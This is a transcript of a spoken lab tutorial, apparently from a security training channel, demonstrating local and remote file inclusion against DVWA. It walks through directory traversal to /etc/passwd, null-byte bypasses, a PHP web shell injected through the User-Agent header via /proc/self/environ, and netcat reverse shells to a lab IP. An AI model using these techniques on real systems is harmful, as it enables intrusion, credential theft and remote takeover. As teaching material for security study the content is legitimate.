Good morning, everyone. My name is Anubhav Khettry, and today I will be taking this live session on file inclusion. Basically, file inclusion have two part, which is LFI and RFI. So, the very first question which comes up here is what is LFI? See, today the reason why we are doing this topic because it was this vulnerability is very common. You can find this vulnerability in many web applications, first thing, and we are trying to learn that how we can detect, how we can exploit it. This is only for education purpose. Okay, so the first thing out here is what is LFI. So LFI stands for local file inclusion, and in which it allows the hacker to gain access or to view the internal files of a server, mainly of a web server. This vulnerability is means how to put it. This vulnerability is available in web applications. So obviously, why web application? This vulnerability allows the hacker to see some sensitive files inside the web server. This is the main thing about this LFI vulnerability. Now let's talk about how does this attack how does the attack take place. How does this vulnerability take place, like where what is the actual vulnerability point. See, the thing how it works is whenever it's like this type of vulnerability mainly found in PHP codes, it is very common. Others also you can find, but in PHP it is very common to find this kind of vulnerability. So suppose there's a website which is accessing some internal file. It is very common to access some internal files or maybe files from outside for the web application. So to do all those things you need to include those pages to your code, right? So if the developer, they are taking inputs directly from the user, if they are taking inputs directly from the user and then they are including that input directly to their code, then that can lead to LFI vulnerability, especially when they are taking input as a path. Okay, they're taking this path, whatever path you're giving as a input. So that point of time, it causes this vulnerability when the user's data are not sanitized properly. So this is some example of the vulnerable code out here, if you can see. So let's take this code for an example. That suppose there's a website hosting and they're taking image as an input in the image parameter. So let's type it something like this, that there can be this website something like this example, and for instance something page index.php, and out there's this parameter something like this image, and whatever input you will give, that will hit out here in the include section. Include, so this is the location of the image dot, and then whatever thing you will give, suppose you give 2 image 2, okay, so it will get put out here. They will search for the image 2 and then they will display on the web application. So now as you can see, whatever input I am giving, they are not sanitizing it, they are directly taking and putting it inside the code. So the hacker can easily manipulate to go inside some other directory by doing like this. So we know dot dot slash means you're going one directory back, then again dot dot slash means two directories back. So something like this, and then they can search for some sensitive files, like if you're in Linux system you can search for passwd files, something like this. So this is the main vulnerability out here. In few cases, suppose there's this some other code also available out here where the developer puts this file extension. So whatever file you will give, suppose if I put for instance jpg for an instance, okay, so whatever file I give out here, I need to make sure that the file should be ending with .jpg, okay, or they will put by themselves, they will put themselves as .jpg to make sure that no other files are fetched. So even if you try to search for double dot slash double dot slash double dot slash etc slash passwd, the .jpg will be added out there. Obviously this file is not available, so we can bypass this thing also by using null bytes. So using null bytes we can bypass it, like giving, wait, giving this null byte. So basically when our codes are processed, so while processing the whole code, as soon as they see this null byte, so in the actual very low level language, so they will see like there's this null byte and all. So what they do is they will assume that at this particular location the code is ending, so means rest of the part will be ignored. So if you write something like this, dot dot slash etc slash pass wd, and add this one out here, the null byte, so this dot jpg out here will be ignored completely. Also, this is how you can do few things. Now let's talk about some sensitive directories. So these are list of some directories available for Linux and all. So see, there's this passwd shadow file. This is config file available, config, and actually which is available in the root directory of the web money means hosting web page. There's some access log files which you can access. Bash history, it is available, this files are available inside the user, so you need to make sure that you have sufficient permission to get inside that directory to view this file. Etc group, proxy environment, this is also a log file. These files are related to SSH, so these files are available inside the particular user only. So you need to make sure that you have that sufficient permission, and making sure that you know the username to get inside their directory and search for it. And there here are some Windows sensitive files which you can access. Out here like sam file, win.ini, boot.ini. There's some different file, like if there's a Apache directly working on your Windows, this is the http conf file. For php ini file, if you want to see log files, and make sure try to check for the system file and the sam file when you're trying to do LFI RFI inside LFI in this thing Windows. So let's check for the practical how we can do. So for practical, I will be using a lab scenario which is DVWA, won't be performing on a live website because of a lot of different reasons, since it is only for the education purpose only, that's why. So we will be performing the test on DVWA. So you can also build up the setup, either you can get DVWA directly from GitHub, or you can download Metasploitable 2 which comes with DVWA. So I myself is using Metasploitable out here to do this task. So this is the website. So here is a scenario out here. So see, there's this page parameter and they're directly taking input out here. So just to confirm whether this page is actually vulnerable to alpha RFI or not, we can do something like this. LFI vulnerability or not, just give $/$ and search for etc slash passwd or any file, and out here they are giving me vulnerability. But what you can see out here is that they're also giving you information, some important information is how many directories you need to go back to reach to the actual place. So as you can see, there are 1 2 3 4 5 directories are there, right? So if you go 5 directories back, then you will be inside the slash, and from there you can directly go for the etc and passwd file. So let's try it. Now see, I'm able to read the passwd file out here, the complete information. It can be worse, yes, it can be worse, because I'm getting list of all the users, and just say for any luck, if there's a SSH service running, then I can use this users list and I can have a rocky.txt or any other password file, and I can start doing a brute force, and maybe I can get access to any of the user by this. Other things which I can access is let's take a input from here, one of the files. Let's try to access this one, var log apache 2 access log. Apache 2 access.log. Okay, Apache 2 access log is not present. May the file name can be different, so we need to check for it. So let's look for some other location. Proc self environ. Okay, so if this page is visible to you, so let me put this one in a txt file. Just a minute. So these are some information related to your web page. Okay, there are some different headers and informations are given. So whatever informations are here, it will be displayed to you directly when you intercept this data. As you can completely see, so whenever you intercept the data and all, you can see this kind of information. So these are previously stored. It is working like a variable out here, which will be displayed. So can we do some remote code execution? Is it possible? Is it possible to perform a remote code execution using LFI vulnerability? It is possible. So see, there are two methods how you can do it. One method is by using the access log. So that is not always possible. So see, if you have if you have the permission to access the access log file, then what you can do, you can use services like SSH or any other services and send some code. Okay, you can send some get cmd or maybe reverse shell code out there, and just then you need to only call the access log file, and then you can do that. You can do remote code execution. Either you can do it like that, or you can take some different method also by using the environment file, proc self environment. This method is much easier in compared to log poisoning one, because log poisoning sometimes it works, sometimes it doesn't work, but this one, if you're able to access this file, it will surely work. That's the best part about this one. So we'll try to enumerate this, that how we can exploit it. So for that I will require some things. I'll look at burp suit. We can do with temper data also, but burp suit will be much easier. It takes some time to open, especially in if you're running in VirtualBox or something. It's taking too much time. I think everyone is familiar with Bobsuit, how it works. So it works on proxy, so you need to set up a proxy. Then once you set up a proxy in the browser, all the requests will be sent to the Bobsuit, as Bobsuit will be listening on that proxy. And as soon as all the requests are like sent to the Bobsuit will intercept those requests and it will keep it with itself until unless either you drop forward or do something with the packet. Okay, so this is how Bobsuit works. So let me first go out here and do some changes. Let me set proxy. Well, I thought that Parrot will be much better compared to Kali, but it also has the same result of lagging. So as you all can see, it is running on 3 GB RAM, but still everything freezed up. Nothing working properly. If I try to restart, it will take long amount of time for me to restart. I need to close my parrot, just a minute, wait. Let's try this one. About using a operating system, I will suggest that neither go for Linux or Parrot. See, Parrot is somewhat better than Kali in many cases, but I will suggest that building your own, like you have a Ubuntu as a base and start installing different cybersecurity tools out there. It will be much better to work with rather than having this type of problems every once in a while. Like you'll see, many exploit won't work, many tools won't work because of all these things. So the best choice is like start building your own operating system which will work according to you. Will be much better because see, many tools are already built up inside it, and there are a lot of tools which we will never be using in our whole life. So they will be taking extra space and even consuming RAM, processors, everything. So it will make your operating system slower and hard to work with. Okay, only problem out here is that you all need to deal with the screen settings. Let me see if I can change the display size so that it can be better visible to everyone. Change. Okay, just a minute. मम्मी आपका आवाज यहाँ तक आ रहा है? Finally, everything started working. Hmm. It also freezed. Just a minute. Let it work in the background. Let me try to work it out with Firefox directly out here. Let's see. 43 or 233. Hmm. Hmm. Let me try to do this thing out here from the console directly. See, by changing this user agent, we can do all these kind of things, but I need to wait for it. Changing things from here won't work properly. That's the main issue out here. Won't allow me to edit also. That's the main problem. Edit and resend. Just a minute. Wait. Request header. Okay, out here at this location. So just add a simple PHP code. I think this portion is visible. PHP system, then $get cmd. This is the code which you need to send uh, in the user agent portion. So as you can see, it will accept for the uh, any input in the CMD parameter. So we need to add CMD parameter out here. So let's add it like this, and CMD equals to, and let's give it a command ls. Won't possible to see the response properly out here. Not possible. I need to wait for burp suite to work, then only it is possible. Previously temper data extension was there, so that would have made things much easier, but right now temper data extension is not available, so working without it is very difficult. So I need to wait for burp suite to work out here. Security. Okay, finally something good after this long. So my proxy settings are set already to 127.0.0.1 port 8080. Just a minute, wait, let me close it. So it's running. I turn off the intercept so that I can set all these things out here first. File inclusion. Go to network proxy, go to manual proxy and set 127.0.0.1. Since your burp suite is also listening on the local port only, that's why, like in your same system, so that's why I set it to 127.0.0.1. Click OK. Now we'll change the page. So there's a page out here. From here, turn on the intercept and forward the request. So now the request is, wait. Now the request is intercepted by burp suite. So either you can do directly out here or you can send it to repeater. I think repeater will be the best choice because you can check for the request, right? So whatever you're sending, whether it is working right or not. Otherwise you need to again intercept it, again do it from the very beginning. So for all those things I prefer using this method. Okay, so you can use the repeater, and from repeater you can do all those things. So like in the previous case, remove till this much, php system $_ get So this is the code out here, and out here we'll add cmd equals to ls, and we try to run this command. Syntax error near this thing. Okay, wait, I didn't close it. Let me review the code first, just a minute. It's not accepting the code for some reason. PHP system. The code looks fine to me. Okay, I give it opposite actually. It should be opposite. This one should be this one, and it should be this one. Got mixed up out here. I think now it should work properly. So as you can see, as soon as I run this code, you can see the output out here. So they are giving me the directory information: help, include.php, index.php, source. See, these are the files available, and if I want, wait, percentage 20, then hyphen LAH. You see the whole information. So I can do remote code execution out here, and yes, about taking a reverse shell, that is also possible by using LFI. If you want, I can run other codes also, like uname, percentage. Make sure to always unicode the code whenever you are passing it into the URL. Okay, otherwise it won't work. Uname hyphen a send. See, Linux Metasploit table. So if you want to take a reverse shell also, you can do it in a very simple way. Start a netcat, and LVP listener at suppose 1234 port, and remember the IP 186. So I know that netcat is there. If netcat was not there, then you need to go to use some different methods to take a reverse shell. So since I know netcat is there, so I will utilize netcat out here to take a reverse shell. Netcat percentage 20, again percentage 20, then slash bin slash sh, again percentage 20. See, you can do it in both ways. Either you can try to take from here, or you can take it from here also by using pass-through function. Both ways will work. So let me try to show you from CMD prompt first. Then the IP address 192.168.43. 186, then again okay, see, I got a connection from here. ID, who am I, w data, uname hyphen a. See, so I got a reverse shell using LFI. That is also possible. This is about LFI. Now what about RFI, the another portion of it, which is remote file inclusion. So as the name suggests, local means for the local files, remote means outside the server. So you will be able to access outside resources. So basically, as soon as we provide HTTP and all, it is accepted by the parameter, and then it redirects you to that particular resource and lets you access it. The things which you can do, yes, reverse shell is also possible using that, and even the remote code execution is also possible. So let's see it out here. Wait, I'll turn off the intercept, everything. So how to perform a remote code execution, sorry, RFI, remote file inclusion. So just type https colon double slash, let's try to fetch google.com. I hope my proxy doesn't cause any problem there, so I'll turn off the proxy out here and search for the page. So as you can see, the resource of google.com opened up out here. So that means I can access the resource of another server or anything. So see, if you talk about the attack, which one we need to prefer, people will always try to prefer RFI over LFI. The reason is simple, that because it lets you uh, access file over the public IP address or different server, right? So they can host something or a malicious file over their public IP, and then they can easily access it by using this RFI vulnerability. It will be much easier to take a reverse connection using that, or execute a remote code rather than by trying to do using LFI. Okay, so let's try to run some remote codes out here. How we can do it? So I will go inside /var /www html, go inside this directory and create a file. So I'll use nano to create a file. Let's call it test.txt and write a code. I'll write the same PHP code. See, the reason why that PHP code worked last time also, because all the informations are there inside this thing, /proc self and environ, right? And all those variables are even being fetched by the whenever you intercept any data. So both datas are related, so any changes you make out here, that will be reflected in that file. Simple as that. So as soon as we wrote that PHP code, and then that file was opened by a PHP, right? That file got opened by PHP, and as soon as PHP was going through the file, PHP read that code, that PHP code written out there, and as soon as it read the code, it understood that it's a PHP code and it executed automatically. That's why I was able to do a remote code execution. Okay, same way I will try to do the same thing out here also, write the same command, but instead of this I will just do a normal ls. I'm trying to run some remote codes, right? Save this page and start the Apache server, service Apache 2, start. And what I only need to do, I need to only access this file, that's it. http colon double slash 192.168.43.180, what it was, 186 slash test.txt. So see what will happen. As soon as I try to run this file, this txt file will try to open up out here, and it will read what? It will read that PHP code, and it will get executed on the server. See, ls. The file informations are being displayed. So if you want, you can keep on changing the file information from within. LAH, for instance. See, or if you want, uname -a. See, this also works. Our reverse connection, is it possible? Yes, it is possible. We can do reverse connection also using RFI. So change the code out here, netcat -e /bin/sh 192.168.43.186. See, no need to create a this thing reverse PHP file or anything. You can just do using this one only. This is the best technique out here. 1234. Okay. Or you can make this page vulnerable to this thing remote code execution. You can accept the everything inside CMD parameter, and using that, then you can start running your own code. You can use either PHP, Python, or any other. You can get the code, the single liner reverse shell code from Pentest Monkeys. I myself prefer that, so they have a very good code out there. So you can use any of the codes from there, whichever is supported by the web application, and you can take a reverse shell. Close this one and start a netcat listener and see. Wait. Page got stuck, and if you look at out here, I got a reverse connection. So ID, everything will work in the same manner only. See, I got a access using RFI also. So both are possible. You can take reverse shell either using LFI or RFI. Both will work. And the vulnerability point is what? See, especially this. Remember I talked about null byte in the very beginning section. See, for using null byte, that only works till Python 5.3 or 5.6. So that is actually outdated mode, so it doesn't work after that. So what you can do, there's another way to bypass it by using a question mark after the whatever file path you gave. You can use question mark. Okay, so that can also bypass your this thing, whatever filters are there. Okay, you can bypass it. So there are different methods. The point of vulnerability is when the user inputs are taken directly and included in the parameter directly. That is the main vulnerability point. So whenever you're taking user input, make sure to sanitize it. That's the only way. So I hope you all like this session. So we'll come up uh, again with some more new different topics and all more interesting things. So hope to stay tuned, subscribe our channel, like and comment. And if you want to know about more different topics, you can suggest the topics. Okay, so we'll try to bring that content to you all in the next session. So try to bring up some new topics. If you want to know about something, let us know. We'll try to prepare something for that so that we can cover up in the given amount of time so that you all can also enjoy. There was a lot of inconvenience while doing the practical because my parents stopped working, Kali was working slow. So it happens in cybersecurity. It's a normal thing. See, it's a computer. We cannot do anything about it. It can stop working the like any moment. Okay, so I hope you all liked it. Please like and subscribe our channel and comment. Leave the comment down below so that we can know what kind of topics you all want to know about, so that we can bring the same topic to you all in the next session. Okay, I'm mentioning the words same topic. And if you all want, you can visit our website isoeh.com, and out there are a lot of different courses, so you can enroll out there and join. And if you need any help, so you can query to us like about the course content and everything. We will be there to help. Okay, stay home, stay safe.